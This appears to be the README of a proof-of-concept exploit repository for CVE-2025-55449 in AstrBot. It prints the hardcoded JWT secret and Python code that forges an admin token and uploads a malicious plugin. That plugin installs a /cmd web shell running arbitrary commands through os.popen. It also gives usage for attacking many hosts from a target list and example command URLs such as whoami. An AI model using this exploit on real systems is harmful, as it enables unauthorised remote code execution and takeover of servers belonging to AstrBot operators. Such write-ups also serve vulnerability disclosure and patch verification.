# CVE-2025-55449 - AstrBot Remote Code Execution (RCE) Vulnerability

## Overview

This repository contains a proof-of-concept exploit for **CVE-2025-55449**, a critical Remote Code Execution (RCE) vulnerability in AstrBot. The vulnerability allows an attacker to execute arbitrary code on the target system by exploiting weak JWT authentication and the plugin installation mechanism.

## Vulnerability Description

The vulnerability exists due to:

1. **Hardcoded JWT Secret Key**: AstrBot uses a hardcoded JWT secret key (`Advanced_System_for_Text_Response_and_Bot_Operations_Tool`) for authentication, allowing attackers to forge valid authentication tokens.

2. **Unrestricted Plugin Installation**: The `/api/plugin/install-upload` endpoint allows authenticated users to upload and install plugins without proper validation, enabling the execution of arbitrary Python code.

3. **Code Execution via Plugin System**: The plugin system allows plugins to modify the application's routing and execute arbitrary commands through the Flask/Quart application instance.

## Technical Details

### Attack Vector

1. **JWT Token Forgery**: The exploit forges a JWT token using the hardcoded secret key with admin privileges.

2. **Code execution vulnerability**:The remote code execution vulnerability in the backend exploits the application's built-in plugin extension feature, allowing users to upload custom plugin packages. The program decompresses the packages, reads the plugin's information, imports the object's Python file, and executes the code.

### Exploit Flow

```
1. Forge JWT token with hardcoded secret
2. Create malicious plugin ZIP file
3. POST to /api/plugin/install-upload with forged token
4. Plugin installs and adds /cmd endpoint
5. Execute commands via /cmd?cmd=<command>
```

## Requirements

- Python 3.6+
- Required Python packages:
  - `jwt` (PyJWT)
  - `requests`
  - `zipfile` (built-in)
  - `argparse` (built-in)
  - `datetime` (built-in)
  - `pathlib` (built-in)

## Installation

1. Clone this repository:
```bash
git clone <repository-url>
cd CVE-2025-55449
```

2. Install required dependencies:
```bash
pip install PyJWT requests
```

## Usage

### Single Target

Execute the exploit against a single target URL:

```bash
python main.py http://target-ip:port
```

### Multiple Targets

Create a file (`ip.txt`) with one URL per line:
```
http://target1:6185
http://target2:6185
http://target3:6185
```

Then run:
```bash
python main.py -r ip.txt
```

### Example Output

Upon successful exploitation, the script will output:
```
http://target-ip:port/cmd?cmd=id
```

You can then execute commands by accessing:
```
http://target-ip:port/cmd?cmd=<your-command>
```

For example:
```
http://target-ip:port/cmd?cmd=whoami
http://target-ip:port/cmd?cmd=ls -la
```

## Project Structure

```
CVE-2025-55449/
├── main.py                 # Main exploit script
├── ip.txt                  # Example target URLs file
├── README.md              # This file
└── helloworld/            # Malicious plugin directory
    ├── main.py            # Plugin code that adds /cmd endpoint
    ├── metadata.yaml      # Plugin metadata
    ├── LICENSE            # Plugin license
    └── README.md          # Plugin readme
```

## How It Works

### JWT Token Forgery

The exploit uses the hardcoded JWT secret to create a valid authentication token:

```python
key = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"
payload = {"username": "admin", "exp": datetime.datetime.utcnow() + datetime.timedelta(days=7)}
forged = jwt.encode(payload, key, algorithm="HS256")
```

### Malicious Plugin

The plugin (`helloworld/main.py`) exploits Python's import system and Flask/Quart's application instance to inject a new route:

```python
# The plugin finds the Quart application instance and adds a /cmd route
# that executes arbitrary commands via os.popen()
```

### Plugin Upload

The exploit packages the plugin as a ZIP file and uploads it via the authenticated endpoint:

```python
requests.post(
    url + "/api/plugin/install-upload",
    headers={"Authorization": "Bearer " + forged},
    files={"file": (name + ".zip", zip_payload_bytes)}
)
```

